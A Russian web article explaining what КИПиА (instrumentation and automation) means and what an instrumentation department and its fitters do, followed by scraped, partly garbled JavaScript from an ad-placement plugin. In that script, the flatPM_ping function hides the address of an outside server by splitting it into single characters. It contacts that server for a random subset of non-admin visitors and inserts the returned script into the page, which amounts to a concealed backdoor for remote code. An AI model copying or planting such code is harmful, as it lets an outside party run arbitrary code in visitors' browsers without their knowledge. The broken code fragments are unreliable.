Если расшифровать КИПиА, становится понятно, что это не просто замысловатая аббревиатура — она обеспечивает различные сферы жизни удобством, комфортом и безопасностью.

Качественное функционирование какого-либо предприятия, завода или строительство жилого здания невозможно без КИПиА. Всё в деятельности человека связано с автоматикой и удобством, поэтому при устранении чего-нибудь из этого ощутимо пострадает качество жизни.

Чем занимается КИПиА? Расшифровка многое объясняет

Современное производство невозможно представить без приборов и датчиков. Да и в жилом секторе нельзя обойтись без счетчиков для воды, тепла и электричества. Кто налаживает эти полезные приспособления, если возникает необходимость? Кто следит за их правильной работой?

Что такое КИПиА?

«Ларчик» открывается просто: КИПиА – контрольно-измерительные приборы и автоматизация. Отдел КИПиА (расшифровка выше), точнее, служба с таким названием отвечает за работоспособность всей приборной системы на предприятии. Инструменты для учета электричества и бензина, автоматические клапаны, расходомеры, другие средства контроля – все это находится в ведении «киповцев».

Чем занимается слесарь КИПиА

Слесарь-киповец является специалистом по ремонту простых и сложных, обычных и электронных приборов учета и контроля. Кто может на практике применить закон Ома кроме электрика? Образцы владения знаниями законов физики — сотрудники службы автоматизации и наладки различных приборов. Справиться с запуском производства способен только инженер или слесарь КИПиА. Расшифровка этого слова известна всем, кто связан с автоматикой.

Откуда берутся знатоки приборов

Окончив колледж по специальности с соответствующим названием, выпускник может быть полезным в любой из отраслей промышленности. Системы автоматизации применяются на нефтеперегонных заводах и в железнодорожной сфере, в тяжелом машиностроении и на фабриках, выпускающих продукты питания.

От сотрудников отдела КИПиА зависит скорейшее устранение непредвиденных и аварийных ситуаций. Ремонт и техобслуживание насосов, конвейеров, электродвигателей и пневмоклапанов входят в обязанности службы прибористов.

Что может отдел КИПиА

  • на автоматизации электроприводов;
  • на разработке ПО АСУ для пользователей системы;
  • на автоматизации технологий.

Специалисты отдела обеспечивают полный технический сервис и надзор за работой управляющих устройств и систем. Умельцы-киповцы не только знают, как работают подведомственные им приборы, но и профессионально могут разобраться с любой проблеммой с датчиками и измерителями.

Кто главный специалист в отделе

  • Проектирование и внедрение АСУ компьютерной техники с применением современных средств связи и коммуникаций.
  • Подготовка соответствующих данных для проектирования и разработки рабочих и технических проектов.
  • Постановка задач сотрудникам отдела КИПиА, расшифровка подробностей всех должностных инструкций.
  • Разработка технологических схем для задач АСУП, учитывающих организационное и техническое обеспечение всех подсистем.
  • Подготовка техдокументации, инструкций и методичек, связанных с использованием информационных систем управления.
  • Осуществление надзора и периодического контроля за документацией.
  • Исследование причин нарушений и отказов в работе системы и принятие решения по предупреждению и устранению этих недочетов.
  • Участие в обучении сотрудников подразделений предприятия работе с данными автоматических систем управления.
  • Налаживание процесса оформления соответствующей документации.
  • Ответственность за своевременную расшифровку данных, обработанных вычислительной техникой.

Ни одно современное производство не в состоянии справиться с объемом работы без контролирующих процесс автоматических измерительных устройств. В соответствии с требованиями времени, для получения наилучших результатов отделы КИПиА укомплектовываются квалифицированными кадрами, способными обеспечить бесперебойное функционирование важнейших систем предприятия.

голоса
Рейтинг статьи
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};
Яндекс.Метрика